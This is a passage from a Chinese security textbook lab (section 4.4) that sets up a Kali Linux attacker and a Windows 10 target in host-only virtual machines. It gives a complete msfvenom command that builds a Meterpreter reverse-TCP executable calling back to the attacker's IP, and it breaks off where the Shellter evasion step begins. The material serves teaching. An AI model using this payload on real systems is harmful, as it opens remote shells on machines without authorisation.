信息安全技術實用教程-第4版---張同光---ISBN-9787121423031---4.4實例——入侵Windows10
https://my.oschina.net/ztguang/blog/5329391
主 編: 張同光
ISBN號: 978-7-121-42303-1 9787121423031
出版日期: 2021-11-20
出版社: 電子工業出版社
頁碼: 定價:¥69.80元
4.4 實例——入侵Windows 10
1.實驗環境
實驗環境如圖4.1所示,使用2個虛擬機(Windows10_1703_x86_en、KaliLinux)和宿主機(Windows 10),2個虛擬機的網絡連接方式選擇“僅主機(Host-Only)網絡”。宿主機和2個虛擬機的IP地址、三個系統之間的網絡連通性如圖4.2所示。兩個虛擬機分別是Kali Linux 2020和Windows 10。Windows 10 1703作爲被滲透的目標機,Kali Linux作爲攻擊機。
圖4.1 實驗環境
圖4.2 三個系統的IP地址及其之間的網絡連通性
2.入侵過程
第1步:執行msfvenom命令
如圖4.3所示,在Kali Linux終端窗口中執行如下命令:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.56.101 LPORT=4444 -o /root/kali2win10.exe
上面msfvenom命令生成32位Windows可執行文件(kali2win10.exe),該文件實現反向TCP連接,必須指定爲.exe類型,並且必須定義本地主機(LHOST)和本地端口(LPORT)。該實例中,LHOST是攻擊機的IP地址,LPORT是一個端口,一旦目標機受到攻擊,它就會監聽目標機的連接。
圖4.3 執行msfvenom命令
第2步:下載並運行Shellter